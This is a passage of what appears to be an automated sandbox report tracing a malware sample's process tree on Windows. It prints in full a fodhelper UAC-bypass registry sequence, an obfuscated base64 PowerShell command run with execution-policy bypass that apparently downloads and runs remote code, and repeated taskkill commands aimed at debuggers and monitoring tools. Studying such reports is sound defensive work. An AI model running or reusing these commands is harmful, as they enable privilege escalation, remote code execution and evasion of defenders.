QBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=" /f3⤵
- Modifies registry class
- Modifies registry key
PID:2560
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f3⤵
- Modifies registry class
- Modifies registry key
PID:4444
-
-
C:\Windows\system32\fodhelper.exe"C:\Windows\system32\fodhelper.exe"3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Public\Music\SystemProcessHost.SystemProcesses"C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=5⤵
- Blocklisted process makes network request
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" import C:\ProgramData\SysWebConfig\ass6⤵PID:1416
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM 